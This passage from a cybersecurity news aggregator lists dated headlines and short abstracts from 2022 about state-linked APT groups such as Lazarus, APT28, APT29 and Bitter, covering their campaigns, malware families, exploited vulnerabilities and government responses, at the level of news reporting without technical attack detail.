The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) sanctioned the crypto mixer service Tornado Cash used by North Korea. The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) has sanctioned the crypto mixer service...Security Affairs
August 05, 2022
Facebook finds new Android malware used by APT hackers Full Text
Abstract
Meta (Facebook) has released its Q2 2022 adversarial threat report, and among the highlights is the discovery of two cyber-espionage clusters connected to hacker groups known as 'Bitter APT' and APT36 (aka 'Transparent Tribe') using new Android malware.BleepingComputer
July 28, 2022
Things to Know About STIFF#BIZON Campaign Full Text
Abstract
APT37 is targeting high-value organizations in Poland, the Czech Republic, and other European countries with Konni RAT. The campaign is dubbed STIFF#BIZON. The attached phishing document is a decoy and appears to be a report from a Russian war correspondent, Olga Bozheva. Researchers have shared som...Cyware Alerts - Hacker News
July 28, 2022
Kimsuky APT Deploys Clever Mail-Stealing Browser Extension Called SHARPEXT Full Text
Abstract
This actor is believed to be North Korean in origin and is often publicly referred to under the name Kimsuky. The definition of which threat activity comprises Kimsuky is a matter of debate amongst threat intelligence analysts.Volexity
July 25, 2022
Chinese APT Group Taking Over Belgian Ministries Full Text
Abstract
The Minister for Foreign Affairs of Belgium claimed that several China-linked APT groups—APT27, APT30, and APT3—targeted the nation’s defense and interior ministries. However, the spokesperson of the Chinese Embassy in Belgium denied the accusations.Cyware Alerts - Hacker News
July 24, 2022
Is APT28 behind the STIFF#BIZON attacks attributed to North Korea-linked APT37? Full Text
Abstract
North Korea-linked APT37 group targets high-value organizations in the Czech Republic, Poland, and other countries. Researchers from the Securonix Threat Research (STR) team have uncovered a new attack campaign, tracked as STIFF#BIZON, targeting high-value...Security Affairs
July 22, 2022
TA4563 group leverages EvilNum malware to target European financial and investment entities Full Text
Abstract
A threat actor tracked as TA4563 is using EvilNum malware to target European financial and investment entities. A threat actor, tracked as TA4563, leverages the EvilNum malware to target European financial and investment entities, Proofpoint reported....Security Affairs
July 21, 2022
APT29 Abuses Online Storage Services Google Drive and Dropbox Full Text
Abstract
Research by Unit 42 revealed that APT29, aka Nobelium and Cozy Bear, has resorted to leveraging cloud storage services, including Google Drive, to attack multiple Western diplomatic missions. Phishing messages within included a link to a malicious HTML file, EnvyScout, that acts as a dropper to sec ... Read MoreCyware Alerts - Hacker News
July 20, 2022
Belgium claims China-linked APT groups hit its ministries Full Text
Abstract
The Minister for Foreign Affairs of Belgium blames multiple China-linked threat actors for attacks against the country's defense and interior ministries. The Minister for Foreign Affairs of Belgium revealed that multiple China-linked APT groups targeted...Security Affairs
July 19, 2022
Russia-linked APT29 relies on Google Drive, Dropbox to evade detection Full Text
Abstract
Russia-linked threat actors APT29 are using the Google Drive cloud storage service to evade detection. Palo Alto Networks researchers reported that the Russia-linked APT29 group, tracked by the researchers as Cloaked Ursa, started using the Google...Security Affairs
July 17, 2022
APT groups target journalists and media organizations since 2021 Full Text
Abstract
Researchers from Proofpoint warn that various APT groups are targeting journalists and media organizations since 2021. Proofpoint researchers warn that APT groups are regularly targeting and posing as journalists and media organizations since early...Security Affairs
July 7, 2022
North Korea-linked APTs use Maui Ransomware to target the Healthcare industry Full Text
Abstract
US authorities have issued a joint advisory warning of North Korea-linked APTs using Maui ransomware in attacks against the Healthcare sector. The FBI, CISA, and the U.S. Treasury Department issued a joint advisory that warns of North Korea-linked...Security Affairs
July 06, 2022
Bitter APT Hackers Continue to Target Bangladesh Military Entities Full Text
Abstract
Military entities located in Bangladesh continue to be at the receiving end of sustained cyberattacks by an advanced persistent threat tracked as Bitter. "Through malicious document files and intermediate malware stages the threat actors conduct espionage by deploying Remote Access Trojans," cybersecurity firm SECUINFRA said in a new write-up published on July 5. The findings from the Berlin-headquartered company build on a previous report from Cisco Talos in May, which disclosed the group's expansion in targeting to strike Bangladeshi government organizations with a backdoor called ZxxZ . Bitter, also tracked under the codenames APT-C-08 and T-APT-17, is said to be active since at least late 2013 and has a track record of targeting China, Pakistan, and Saudi Arabia using different tools such as BitterRAT and ArtraDownloader. The latest attack chain detailed by SECUINFRA is believed to have been conducted in mid-May 2022, originating with a weaponized ExcelThe Hacker News
July 1, 2022
Evilnum APT Returns with Better TTPs Full Text
Abstract
The campaign uses macro-laden documents that have varying filenames, containing the term ‘compliance’. At least nine such documents have been identified.Cyware Alerts - Hacker News
June 30, 2022
Experts blame North Korea-linked Lazarus APT for the Harmony hack Full Text
Abstract
North Korea-linked Lazarus APT group is suspected to be behind the recent hack of the Harmony Horizon Bridge. Recently, threat actors have stolen $100 million in cryptocurrency from the Blockchain company Harmony. The company reported the incident...Security Affairs
June 28, 2022
APT Hackers Targeting Industrial Control Systems with ShadowPad Backdoor Full Text
Abstract
Entities located in Afghanistan, Malaysia, and Pakistan are in the crosshairs of an attack campaign that targets unpatched Microsoft Exchange Servers as an initial access vector to deploy the ShadowPad malware. Russian cybersecurity firm Kaspersky, which first detected the activity in mid-October 2021, attributed it to a previously unknown Chinese-speaking threat actor. Targets include organizations in the telecommunications, manufacturing, and transport sectors. "During the initial attacks, the group exploited an MS Exchange vulnerability to deploy ShadowPad malware and infiltrated building automation systems of one of the victims," the company said. "By taking control over those systems, the attacker can reach other, even more sensitive systems of the attacked organization." ShadowPad , which emerged in 2015 as the successor to PlugX, is a privately sold modular malware platform that has been put to use by many Chinese espionage actors over the years. WThe Hacker News
June 26, 2022
China-linked APT Bronze Starlight deploys ransomware as a smokescreen Full Text
Abstract
China-linked APT Bronze Starlight is deploying post-intrusion ransomware families as a diversionary action to its cyber espionage operations. Researchers from Secureworks reported that a China-linked APT group, tracked as Bronze Starlight (APT10),...Security Affairs
June 23, 2022
Chinese Tropic Trooper APT spreads a hacking tool laced with a backdoor Full Text
Abstract
China-linked APT group Tropic Trooper has been spotted using previously undocumented malware written in the Nim language. Check Point Research uncovered an activity cluster with ties to China-linked APT Tropic Trooper (aka Earth Centaur, KeyBoy, and Pirate...Security Affairs
June 22, 2022
Russian Hackers APT28 and UAC-0098 Target Ukraine Again Full Text
Abstract
CERT-UA issued two separate alerts unveiling the malicious activity by APT28 and UAC-0098 hacker groups as they weaponized Follina to deploy Cobalt Strike beacon and CredoMap malware, respectively. APT28 is sending emails laden with a malicious document that tries to exploit the fear among Ukr ... Read MoreCyware Alerts - Hacker News
June 21, 2022
New ToddyCat APT targets high-profile entities in Europe and Asia Full Text
Abstract
Researchers linked a new APT group, tracked as ToddyCat, to a series of attacks targeting entities in Europe and Asia since at least December 2020. Researchers from Kaspersky have linked a new APT group, tracked as ToddyCat, to a series of attacks...Security Affairs
June 20, 2022
Russian APT28 hacker accused of the NATO think tank hack in Germany Full Text
Abstract
The Attorney General has issued an arrest warrant for a hacker who targeted a NATO think tank in Germany for the Russia-linked APT28. The Attorney General has issued an arrest warrant for the Russian hacker Nikolaj Kozachek (aka "blabla1234565" and "kazak")...Security Affairs
June 17, 2022
Chinese DriftingCloud APT exploited Sophos Firewall Zero-Day before it was fixed Full Text
Abstract
China-linked threat actors exploited the zero-day flaw CVE-2022-1040 in Sophos Firewall weeks before it was fixed by the security vendor. Volexity researchers discovered that the zero-day vulnerability, tracked as CVE-2022-1040, in Sophos Firewall...Security Affairs
June 15, 2022
Gallium Group Expands to New Geographical Areas with PingPull RAT Full Text
Abstract
Chinese state-sponsored Gallium APT group is using a new, difficult-to-detect RAT—PingPull—in its espionage campaigns. The RAT can leverage ICMP, raw TCP, and HTTP(S) protocols for C2 communication. The targeted entities are based in Australia, Russia, the Philippines, Belgium, Vietnam, Malaysia, C ... Read MoreCyware Alerts - Hacker News
June 13, 2022
Russia-linked APT targets Ukraine by exploiting the Follina RCE vulnerability Full Text
Abstract
Ukraine's Computer Emergency Response Team (CERT) warns that the Russia-linked Sandworm APT group may exploit the Follina RCE vulnerability. Ukraine's Computer Emergency Response Team (CERT) is warning that the Russia-linked Sandworm APT may be exploiting...Security Affairs
June 13, 2022
GALLIUM APT used a new PingPull RAT in recent campaigns Full Text
Abstract
China-linked Gallium APT employed a previously undocumented RAT, tracked as PingPull, in a recent cyber espionage campaign targeting South Asia, Europe, and Africa. China-linked Gallium APT (aka Softcell) used a previously undocumented remote access...Security Affairs
June 11, 2022
Iran-linked Lyceum APT adds a new .NET DNS Backdoor to its arsenal Full Text
Abstract
Iran-linked Lyceum APT group uses a new .NET-based DNS backdoor to target organizations in the energy and telecommunication sectors. The Iran-linked Lyceum APT group, aka Hexane or Spilrin, used a new .NET-based DNS backdoor in a campaign aimed at companies...Security Affairs
June 9, 2022
Previously undocumented Aoqin Dragon APT targets entities in Southeast Asia and Australia Full Text
Abstract
Researchers spotted a previously undocumented Chinese-speaking APT, tracked as Aoqin Dragon, targeting entities in Southeast Asia and Australia. SentinelOne documented a series of attacks aimed at government, education, and telecom entities in Southeast...Security Affairs
June 9, 2022
Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years Full Text
Abstract
The threat actor has a history of using document lures with pornographic themes to infect users and makes heavy use of USB shortcut techniques to spread the malware and infect additional targets.Sentinel One
June 6, 2022
Microsoft seized 41 domains used by Iran-linked Bohrium APT Full Text
Abstract
Microsoft's Digital Crimes Unit (DCU) announced the seizure of domains used by Iran-linked APT Bohrium in spear-phishing campaigns. Microsoft's Digital Crimes Unit (DCU) announced that it has taken legal action to disrupt a spear-phishing operation...Security Affairs
June 3, 2022
LuoYu APT delivers WinDealer malware via man-on-the-side attacks Full Text
Abstract
Chinese LuoYu Hackers Using Man-on-the-Side Attacks to Deploy WinDealer Backdoor. An "extremely sophisticated" China-linked APT tracked as LuoYu was delivering malware called WinDealer via man-on-the-side attacks. Researchers from Kaspersky have...Security Affairs
June 3, 2022
SideWinder Launched More than 1,000 Attacks in Two Years Full Text
Abstract
The SideWinder APT has launched more than 1,000 attacks while leveraging over 400 domains and subdomains, with additional stealth mechanisms. The threat group is maintaining a large C2 infrastructure comprising more than 400 domains and subdomains that were used to host malicious payloads and manag ... Read MoreCyware Alerts - Hacker News
June 1, 2022
China-linked TA413 group actively exploits Microsoft Follina zero-day flaw Full Text
Abstract
A China-linked APT group is actively exploiting the recently disclosed Follina zero-day flaw in Microsoft Office in attacks in the wild. China-linked APT group TA413 has been observed exploiting the recently disclosed Follina zero-day flaw (tracked...Security Affairs
May 31, 2022
Chinese Hackers Begin Exploiting Latest Microsoft Office Zero-Day Vulnerability Full Text
Abstract
An advanced persistent threat (APT) actor aligned with Chinese state interests has been observed weaponizing the new zero-day flaw in Microsoft Office to achieve code execution on affected systems. "TA413 CN APT spotted [in-the-wild] exploiting the Follina zero-day using URLs to deliver ZIP archives which contain Word Documents that use the technique," enterprise security firm Proofpoint said in a tweet. "Campaigns impersonate the 'Women Empowerments Desk' of the Central Tibetan Administration and use the domain tibet-gov.web[.]app." TA413 is best known for its campaigns aimed at the Tibetan diaspora to deliver implants such as Exile RAT and Sepulcher as well as a rogue Firefox browser extension dubbed FriarFox . The high-severity security flaw, dubbed Follina and tracked as CVE-2022-30190 (CVSS score: 7.8), relates to a case of remote code execution that abuses the "ms-msdt:" protocol URI scheme to execute arbitrary code. SpecificThe Hacker News
May 31, 2022
SideWinder carried out over 1,000 attacks since April 2020 Full Text
Abstract
SideWinder, an aggressive APT group, is believed to have carried out over 1,000 attacks since April 2020, Kaspersky reported. Researchers from Kaspersky have analyzed the activity of an aggressive threat actor tracked as SideWinder (aka RattleSnake...Security Affairs
May 31, 2022
Windows MSDT zero-day now exploited by Chinese APT hackers Full Text
Abstract
Chinese-linked threat actors are now actively exploiting a Microsoft Office zero-day vulnerability (known as 'Follina') to execute malicious code remotely on Windows systems.BleepingComputer
May 28, 2022
Experts believe that Russian Gamaredon APT could fuel a new round of DDoS attacks Full Text
Abstract
360 Qihoo reported DDoS attacks launched by APT-C-53 (aka Gamaredon) conducted through the open-source DDoS Trojan program LOIC. Researchers at 360 Qihoo observed a wave of DDoS attacks launched by Russia-linked APT-C-53 (aka Gamaredon) and reported...Security Affairs
May 28, 2022
Reuters: Russia-linked APT behind Brexit leak website Full Text
Abstract
Russia-linked threat actors are behind a new website that published leaked emails from leading proponents of Britain's exit from the EU, Reuters reported. According to a Google cybersecurity official and the former head of UK foreign intelligence,...Security Affairs
May 25, 2022
Unknown APT group is targeting Russian government entities Full Text
Abstract
An unknown APT group has been targeting Russian government entities since the beginning of the Russian invasion of Ukraine. Researchers from Malwarebytes observed an unknown Advanced Persistent Threat (APT) group targeting Russian government entities with...Security Affairs
May 24, 2022
Twisted Panda: Chinese APT Targets Russian Orgs Full Text
Abstract
The targeted attack, dubbed Twisted Panda, has been going on since at least June 2021 and spied on at least two Russian defense research institutes and another unknown target in Belarus.Cyware Alerts - Hacker News
May 24, 2022
Unknown APT group has targeted Russia repeatedly since Ukraine invasion Full Text
Abstract
An unknown Advanced Persistent Threat (APT) group has targeted Russian government entities through at least four separate spear-phishing campaigns since late February 2022.Malwarebytes Labs
May 23, 2022
Russia-linked Turla APT targets Austria, Estonia, and NATO platform Full Text
Abstract
Russia-linked APT group Turla was observed targeting the Austrian Economic Chamber, a NATO eLearning platform, and the Baltic Defense College. Researchers from SEKOIA.IO Threat & Detection Research (TDR) team have uncovered a reconnaissance...Security Affairs
May 22, 2022
North Korea-linked Lazarus APT uses Log4J to target VMware servers Full Text
Abstract
North Korea-linked Lazarus APT is exploiting the Log4J remote code execution (RCE) in attacks aimed at VMware Horizon servers. North Korea-linked group Lazarus is exploiting the Log4J RCE vulnerability (CVE-2021-44228) to compromise VMware Horizon...Security Affairs
May 21, 2022
Russia-linked Sandworm continues to conduct attacks against Ukraine Full Text
Abstract
Security researchers from ESET reported that the Russia-linked APT group Sandworm continues to target Ukraine. Security experts from ESET reported that the Russia-linked cyberespionage group Sandworm continues to launch cyber attacks against entities...Security Affairs
May 19, 2022
China-linked Space Pirates APT targets the Russian aerospace industry Full Text
Abstract
A new China-linked cyberespionage group known as 'Space Pirates' is targeting enterprises in the Russian aerospace industry. A previously unknown Chinese cyberespionage group, tracked as 'Space Pirates', targets enterprises in the Russian aerospace...Security Affairs
May 18, 2022
Bangladesh Added to Targets in Bitter APT’s Ongoing Campaign Full Text
Abstract
Cisco Talos revealed an ongoing campaign operated by the APT actor since August 2021. The campaign has been launched against an elite unit of the Bangladeshi government via spear-phishing emails.Cyware Alerts - Hacker News
May 15, 2022
Ukraine CERT-UA warns of new attacks launched by Russia-linked Armageddon APT Full Text
Abstract
Ukraine Computer Emergency Response Team (CERT-UA) reported a phishing campaign conducted by Armageddon APT using GammaLoad.PS1_v2 malware. Ukraine Computer Emergency Response Team (CERT-UA) reported a phishing campaign using messages with subject...Security Affairs
May 11, 2022
Bitter APT Hackers Add Bangladesh to Their List of Targets in South Asia Full Text
Abstract
An espionage-focused threat actor known for targeting China, Pakistan, and Saudi Arabia has expanded to set its sights on Bangladeshi government organizations as part of an ongoing campaign that commenced in August 2021. Cybersecurity firm Cisco Talos attributed the activity with moderate confidence to a hacking group dubbed the Bitter APT based on overlaps in the command-and-control (C2) infrastructure with that of prior campaigns mounted by the same actor. "Bangladesh fits the profile we have defined for this threat actor, previously targeting Southeast Asian countries including China , Pakistan, and Saudi Arabia," Vitor Ventura, lead security researcher at Cisco Talos for EMEA and Asia, told The Hacker News. "And now, in this latest campaign, they have widened their reach to Bangladesh. Any new country in southeast Asia being targeted by Bitter APT shouldn't be of surprise." Bitter (aka APT-C-08 or T-APT-17) is suspected to be a South Asian hackingThe Hacker News
May 11, 2022
Bitter APT Adds Bangladesh to its Targets Full Text
Abstract
Bitter APT, known for targeting China, Pakistan, and Saudi Arabia, reportedly added Bangladesh to its list of targets as researchers find malicious emails sent to officers of the Bangladesh police.Cisco Talos
May 7, 2022
Researchers Associate North-Korean APT38 Group with More Ransomware Strains Full Text
Abstract
A threat researcher from Trellix claimed that APT38 operators (aka Unit 180 of North Korea) have used Beaf, ZZZZ, ChiChi, and PXJ ransomware strains to extort some of their victims.Cyware Alerts - Hacker News
May 7, 2022
UNC3524 APT Has Got Backdoors, Persistency Tactics Under Its Sleeves Full Text
Abstract
Experts noted that UNC3524 has been persistently targeting the emails of employees in the corporate world that focus on development, mergers and acquisitions, and large transactions, with financial motivation.Cyware Alerts - Hacker News
May 7, 2022
US gov sanctions cryptocurrency mixer Blender also used by North Korea-linked Lazarus APT Full Text
Abstract
The U.S. Department of Treasury sanctioned cryptocurrency mixer Blender.io used by North Korea-linked Lazarus APT. The U.S. Department of Treasury sanctioned the cryptocurrency mixer Blender.io used by the North Korea-linked Lazarus APT to launder...Security Affairs
May 5, 2022
Winnti APT Returns in New Operation CuckooBees Campaign Full Text
Abstract
The covert attack campaign was aimed at multiple technology and manufacturing organizations across North America, Western Europe, and East Asia, with an aim of stealing intellectual property.Cyware Alerts - Hacker News
May 4, 2022
APT29 Phishing Campaigns Target Government and Diplomats Full Text
Abstract
The phishing emails pretended to contain policy updates and originated from legitimate email addresses belonging to embassies. The campaign lasted from January to March 2022.Cyware Alerts - Hacker News
May 4, 2022
China-linked Winnti APT steals intellectual property from companies worldwide Full Text
Abstract
A sophisticated cyberespionage campaign, dubbed Operation CuckooBees, conducted by the China-linked Winnti group remained undetected since at least 2019. Researchers from Cybereason uncovered a sophisticated cyberespionage campaign, dubbed Operation...Security Affairs
May 4, 2022
China-linked APT Caught Pilfering Treasure Trove of IP Full Text
Abstract
A state-sponsored threat actor designed a house-of-cards style infection chain to exfiltrate massive troves of highly sensitive data.Threatpost
May 4, 2022
Experts linked multiple ransomware strains North Korea-backed APT38 group Full Text
Abstract
Researchers from Trellix linked multiple ransomware strains to the North Korea-backed APT38 group. The ransomware was employed in attacks on financial institutions; experts estimated that APT38 (Unit 180 of North Korea's cyber-army Bureau 121) has stolen...Security Affairs
May 3, 2022
China-linked APT Curious Gorge targeted Russian govt agencies Full Text
Abstract
China-linked Curious Gorge APT is targeting Russian government agencies, Google Threat Analysis Group (TAG) warns. Google Threat Analysis Group (TAG) reported that an APT group linked to China's People's Liberation Army Strategic Support Force (PLA...Security Affairs
May 3, 2022
China-linked Moshen Dragon abuses security software to sideload malware Full Text
Abstract
A China-linked APT group, tracked as Moshen Dragon, is exploiting antivirus products to target the telecom sector in Asia. A China-linked APT group, tracked as Moshen Dragon, has been observed targeting the telecommunication sector in Central Asia...Security Affairs
May 3, 2022
UNC3524 APT uses IP cameras to deploy backdoors and target Exchange Full Text
Abstract
A new APT group, tracked as UNC3524, uses IP cameras to deploy backdoors and steal Microsoft Exchange emails. Mandiant researchers discovered a new APT group, tracked as UNC3524, that heavily targets the emails of employees that focus on corporate...Security Affairs
May 2, 2022
Russia-linked APT29 targets diplomatic and government organizations Full Text
Abstract
Russia-linked APT29 (Cozy Bear or Nobelium) launched a spear-phishing campaign targeting diplomats and government entities. In mid-January 2022, security researchers from Mandiant spotted a spear-phishing campaign, launched by the Russia-linked...Security Affairs
April 28, 2022
North Korean APT37 Targets Journalists with GoldBackdoor Full Text
Abstract
APT37, suspected to have ties with the North Korean government, was found targeting journalists with sophisticated info-stealer malware dubbed Goldbackdoor. The emails sent to the journalists included a link to download ZIP archives with LNK files. Targets are advised to ensure they don’t open any ... Read MoreCyware Alerts - Hacker News
April 26, 2022
Iran-linked APT Rocket Kitten exploited VMware bug in recent attacks Full Text
Abstract
The Iran-linked APT group Rocket Kitten has been observed exploiting a recently patched CVE-2022-22954 VMware flaw. Iran-linked Rocket Kitten APT group has been observed exploiting a recently patched CVE-2022-22954 VMware Workspace ONE Access flaw...Security Affairs
April 26, 2022
North Korea-linked APT37 targets journalists with GOLDBACKDOOR Full Text
Abstract
North Korea-linked APT37 group is targeting journalists that focus on DPRK with a new piece of malware. North Korea-linked APT37 group (aka Ricochet Chollima) has been spotted targeting journalists focusing on DPRK with a new piece of malware. The...Security Affairs
April 20, 2022
Russian Gamaredon APT continues to target Ukraine Full Text
Abstract
Russia-linked threat actor Gamaredon targets Ukraine with new variants of the custom Pterodo backdoor. Russia-linked Gamaredon APT group (a.k.a. Armageddon, Primitive Bear, and ACTINIUM) continues to target Ukraine and it is using new variants...Security Affairs
April 16, 2022
U.S. Gov believes North Korea-linked Lazarus APT is behind Ronin Validator cyber heist Full Text
Abstract
The U.S. government blames North Korea-linked APT Lazarus for the recent $600 million Ronin Validator cyber heist. The U.S. government attributes the recent $600 million Ronin Validator cryptocurrency heist to the North Korea-linked APT Lazarus. The...Security Affairs
April 14, 2022
Feds: APTs Have Tools That Can Take Over Critical Infrastructure Full Text
Abstract
Threat actors have developed custom modules to compromise various ICS devices as well as Windows workstations that pose an imminent threat, particularly to energy providers.Threatpost
April 13, 2022
U.S. Warns of APT Hackers Targeting ICS/SCADA Systems with Specialized Malware Full Text
Abstract
The U.S. government on Wednesday warned of nation-state actors deploying specialized malware to maintain access to industrial control systems (ICS) and supervisory control and data acquisition (SCADA) devices. "The APT actors have developed custom-made tools for targeting ICS/SCADA devices," multiple U.S. agencies said in an alert. "The tools enable them to scan for, compromise, and control affected devices once they have established initial access to the operational technology (OT) network." The joint federal advisory comes courtesy of the U.S. Department of Energy (DoE), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), and the Federal Bureau of Investigation (FBI). The custom-made tools are specifically designed to single out Schneider Electric programmable logic controllers (PLCs), OMRON Sysmac NEX PLCs, and Open Platform Communications Unified Architecture (OPC UA) servers. On top of that, the unnamed actorsThe Hacker News
April 13, 2022
China-linked Hafnium APT leverages Tarrask malware to gain persistence Full Text
Abstract
China-linked Hafnium APT group started using a new piece of malware to gain persistence on compromised Windows systems. The China-backed Hafnium cyberespionage group is likely behind a piece of new malware, dubbed Tarrask, that's used to maintain...Security Affairs
April 12, 2022
Russia-linked Sandworm APT targets energy facilities in Ukraine with wipers Full Text
Abstract
Russia-linked Sandworm APT group targeted energy facilities in Ukraine with INDUSTROYER2 and CADDYWIPER wipers. Russia-linked Sandworm threat actors targeted energy facilities in Ukraine with a new strain of the Industroyer ICS malware (INDUSTROYER2)...Security Affairs
April 8, 2022
Microsoft disrupted APT28 attacks on Ukraine through a court order Full Text
Abstract
Microsoft obtained a court order to take over seven domains used by the Russia-linked APT28 group to target Ukraine. Microsoft on Thursday announced it has obtained a court order to take over seven domains used by Russia-linked cyberespionage group...Security Affairs
April 07, 2022
Microsoft takes down APT28 domains used in attacks against Ukraine Full Text
Abstract
Microsoft has successfully disrupted attacks against Ukrainian targets coordinated by the Russian APT28 hacking group after taking down seven domains used as attack infrastructure.BleepingComputer
April 5, 2022
Russia-linked Armageddon APT targets Ukrainian state organizations, CERT-UA warns Full Text
Abstract
Ukraine CERT-UA spotted a spear-phishing campaign conducted by Russia-linked Armageddon APT targeting local state organizations. Ukraine CERT-UA published a security advisory to warn of spear-phishing attacks conducted by Russia-linked Armageddon...Security Affairs
April 4, 2022
Experts spotted a new Android malware while investigating Russia-linked Turla APT Full Text
Abstract
Researchers spotted a new piece of Android malware while investigating activity associated with Russia-linked APT Turla. Researchers at cybersecurity firm Lab52 discovered a new piece of Android malware while investigating infrastructure associated...Security Affairs
April 3, 2022
China-linked APT Deep Panda employs new Fire Chili Windows rootkit Full Text
Abstract
The China-linked hacking group Deep Panda is targeting VMware Horizon servers with the Log4Shell exploit to install a new Fire Chili rootkit. Researchers from Fortinet have observed the Chinese APT group Deep Panda exploiting Log4Shell...Security Affairs
March 28, 2022
GhostWriter APT targets state entities of Ukraine with Cobalt Strike Beacon Full Text
Abstract
Ukraine CERT-UA warns that the Belarus-linked GhostWriter APT group is targeting state entities of Ukraine with Cobalt Strike Beacon. Ukraine CERT-UA uncovered a spear-phishing campaign conducted by Belarus-linked GhostWriter APT group targeting Ukrainian...Security Affairs
March 24, 2022
Chinese APT Hackers Targeting Betting Companies in Southeast Asia Full Text
Abstract
A Chinese-speaking advanced persistent threat (APT) has been linked to a new campaign targeting gambling-related companies in South East Asia, particularly Taiwan, the Philippines, and Hong Kong. Cybersecurity firm Avast dubbed the campaign Operation Dragon Castling , describing its malware arsenal as a "robust and modular toolset." The ultimate motives of the threat actor are not immediately discernible as yet nor has it been linked to a known hacking group. While multiple initial access avenues were employed during the course of the campaign, one of the attack vectors involved leveraging a previously unknown remote code execution flaw in the WPS Office suite ( CVE-2022-24934 ) to backdoor its targets. The issue has since been addressed by Kingsoft Office, the developers of the office software. In the case observed by the Czech security firm, the vulnerability was used to drop a malicious binary from a fake update server with the domain update.wps[.]cn that triggers a mThe Hacker News
March 24, 2022
Chinese APT Combines Fresh Hodur RAT with Complex Anti-Detection Full Text
Abstract
Mustang Panda’s already sophisticated cyberespionage campaign has matured even further with the introduction of a brand-new PlugX RAT variant.Threatpost
March 23, 2022
China-linked GIMMICK implant now targets macOS Full Text
Abstract
Gimmick is a newly discovered macOS implant developed by the China-linked APT Storm Cloud and used to target organizations across Asia. In late 2021, Volexity researchers investigated an intrusion in an environment they were monitoring and discovered...Security Affairs
March 23, 2022
APT Group Targets Betting Companies Using MulCom Backdoor in Taiwan, the Philippines, and Hong Kong Full Text
Abstract
Due to the similarities between the MulCom backdoor used by this group and FFRat, researchers suspect that the FFRat codebase is being shared between several Chinese adversary groups.Avast
March 22, 2022
Russia-linked InvisiMole APT targets state organizations of Ukraine Full Text
Abstract
Ukraine CERT (CERT-UA) warns of spear-phishing attacks conducted by UAC-0035 group (aka InvisiMole) on state organizations of Ukraine. The Government Team for Response to Computer Emergencies of Ukraine (CERT-UA) warns of spear-phishing messages...Security Affairs
March 14, 2022
Researchers Find New Evidence Linking Kwampirs Malware to Shamoon APT Hackers Full Text
Abstract
New findings released last week showcase the overlapping source code and techniques between the operators of Shamoon and Kwampirs, indicating that they "are the same group or really close collaborators." "Research evidence shows identification of co-evolution between both Shamoon and Kwampirs malware families during the known timeline," Pablo Rincón Crespo of Cylera Labs said. "If Kwampirs is based on the original Shamoon, and Shamoon 2 and 3 campaign code is based on Kwampirs, […] then the authors of Kwampirs would be potentially the same as the authors of Shamoon, or must have a very strong relationship, as has been seen over the course of many years," Rincón Crespo added. Shamoon, also known as DistTrack, functions as an information-stealing malware that also incorporates a destructive component that allows it to overwrite the Master Boot Record (MBR) with arbitrary data so as to render the infected machine inoperable. The malware, developedThe Hacker News
March 9, 2022
APT41 Spies Broke Into 6 US State Networks via a Livestock App Full Text
Abstract
The China-affiliated state-sponsored threat actor used Log4j and zero-day bugs in the USAHerds animal-tracking software to hack into multiple government networks.Threatpost
March 9, 2022
Russian APTs Furiously Phish Ukraine – Google Full Text
Abstract
Also on the rise: DDoS attacks against Ukrainian sites and phishing activity capitalizing on the conflict, with China’s Mustang Panda targeting Europe.Threatpost
March 9, 2022
Google blocked China-linked APT31’s attacks targeting U.S. Government Full Text
Abstract
Google has blocked a phishing campaign conducted by China-linked group APT31 aimed at Gmail users associated with the U.S. government. Google announced that it had blocked a phishing campaign conducted by the China-linked cyberespionage group...Security Affairs
March 09, 2022
Chinese APT41 Hackers Broke into at Least 6 U.S. State Governments: Mandiant Full Text
Abstract
APT41, the state-sponsored threat actor affiliated with China, breached at least six U.S. state government networks between May 2021 and February 2022 by retooling its attack vectors to take advantage of vulnerable internet-facing web applications. The exploited vulnerabilities included "a zero-day vulnerability in the USAHERDS application (CVE-2021-44207) as well as the now infamous zero-day in Log4j (CVE-2021-44228)," researchers from Mandiant said in a report published Tuesday, calling it a "deliberate campaign." Besides web compromises, the persistent attacks also involved the exploitation of deserialization, SQL injection, and directory traversal vulnerabilities, the cybersecurity and incident response firm noted. The prolific advanced persistent threat, also known by the monikers Barium and Winnti, has a track record of targeting organizations in both the public and private sectors to orchestrate espionage activity in parallel with fiThe Hacker News
March 8, 2022
Google TAG: Russia, Belarus-linked APTs targeted Ukraine Full Text
Abstract
Google TAG observed Russian, Belarusian, and Chinese threat actors targeting Ukraine and European government and military orgs. Google Threat Analysis Group (TAG), which focuses on the analysis of nation-state threat actors, revealed to have blocked...Security Affairs
March 8, 2022
China-linked TA416 Increases Attack Activity Against European Governments as Conflict in Ukraine Escalates Full Text
Abstract
The campaigns utilize web bugs to profile the victims before sending a variety of PlugX malware payloads via malicious URLs. TA416 has recently updated its PlugX malware variant.Proof Point
March 1, 2022
China-linked APT used Daxin, one of the most sophisticated backdoors ever seen Full Text
Abstract
Daxin is the most advanced backdoor in the arsenal of China-linked threat actors designed to avoid the detection of sophisticated defense systems. Symantec researchers discovered a highly sophisticated backdoor, named Daxin, which is being used...Security Affairs
February 28, 2022
Iran-linked UNC3313 APT employed two custom backdoors against a Middle East gov entity Full Text
Abstract
An Iran-linked threat actor, tracked as UNC3313, was observed using two custom backdoors against an unnamed Middle East government entity. UNC3313 is an Iran-linked threat actor that was linked with "moderate confidence" to the MuddyWater nation-state...Security Affairs
February 25, 2022
Ukraine: Belarusian APT group UNC1151 targets military personnel with spear phishing Full Text
Abstract
The CERT of Ukraine (CERT-UA) warned of a spear-phishing campaign targeting Ukrainian armed forces personnel. The Computer Emergency Response Team of Ukraine (CERT-UA) is warning of an ongoing spear-phishing campaign targeting private email accounts...Security Affairs
February 23, 2022
Operation Cache Panda - Chinese APT10 Targets Taiwan Full Text
Abstract
Taiwanese cybersecurity firm CyCraft attributed months-long attacks against Taiwan’s financial sector to the APT10 group (aka Stone Panda or Bronze Riverside), which is affiliated with the Chinese government.Cyware Alerts - Hacker News
February 22, 2022
China-linked APT10 Targets Taiwan’s financial trading industry Full Text
Abstract
China-linked APT group APT10 (aka Stone Panda, Bronze Riverside) targets Taiwan's financial trading sector with a supply chain attack. The campaign launched by the APT10 group started in November 2021, but it hit a peak between 10 and 13 2022,...Security Affairs
February 21, 2022
TunnelVision APT Group Exploits Log4Shell Full Text
Abstract
